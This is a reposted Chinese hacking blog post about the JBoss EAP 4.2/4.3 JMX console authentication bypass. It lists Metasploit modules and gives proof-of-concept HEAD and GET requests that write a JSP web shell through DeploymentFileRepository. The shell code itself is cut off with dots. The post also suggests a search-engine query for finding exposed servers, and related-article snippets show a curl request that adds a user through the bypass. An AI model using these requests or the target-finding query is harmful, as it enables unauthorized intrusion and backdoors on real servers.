jboss非授权访问漏洞

简介:

jboss漏洞参考:http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html

具体影响:

RedHat JBoss EAP 4.3
RedHat JBoss EAP 4.2

JBoss企业应用平台(EAP)是J2EE应用的中间件平台。 JMX控制台配置仅对使用GET和POST HTTP命令的请求指定了认证要求,远程攻击者可以创建没有指定GET或POST的HTTP请求以admin身份进行操作。其实在 RHSA-2008:0828更新修复了未经认证用户可访问状态servlet的漏洞(CVE-2008-3273);但RHSA-2009:0349中 的bug修复重新引入了这个漏洞。在metasploit中已经看到更新了这个漏洞插件:

msf > search jboss
[*] Searching loaded modules for pattern ‘jboss’…

Exploits
========

Name Rank Description
—- —- ———–
multi/http/jboss_deploymentfilerepository excellent JBoss Java Class DeploymentFileRepository Directory Traversal

multi/http/jboss_maindeployer excellent JBoss JMX Console Deployer Upload and Execute
…………

poc:

HEAD /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=ikki&arg2=.jsp&arg3=%3C%25%40+page+import%3D%22java.io.*……. HTTP/1.1

用baidu“inurl:jmx-console”,发现用4.2、4.3版本的不少,可惜主要是windows平台为主。

这里还可以延伸一个小技巧,虽然有些jboss没有密码,但不允许远程发布文件,我们可以用以下解决:

GET /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=ikki&arg2=.jsp&arg3=%3C%25%40+page+import%3D%22java.io.*……. (木马代码) HTTP/1.1

这也是jboss autopwn里的方法。当然metasploit也实现了这点。


















本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/422584,如需转载请自行联系原作者

相关文章
|
安全 应用服务中间件 Perl
jboss seam 远程执行漏洞利用步骤
目标:http://www.ip.comhttp://ip.com/welcome.seam?pwned=java.
1008 0
|
4月前
|
安全 Java 应用服务中间件
渗透测试-JBoss 5.x/6.x反序列化漏洞
渗透测试-JBoss 5.x/6.x反序列化漏洞
57 14
|
开发框架 安全 Java
JBoss中间件漏洞总结
一.Jboss简介 Jboss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 默认端口:8080
776 9
|
Web App开发 安全 应用服务中间件
|
安全 应用服务中间件
jboss 认证绕过漏洞利用的另外一种方式添加用户
curl -I "http://foobar:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservic...
927 0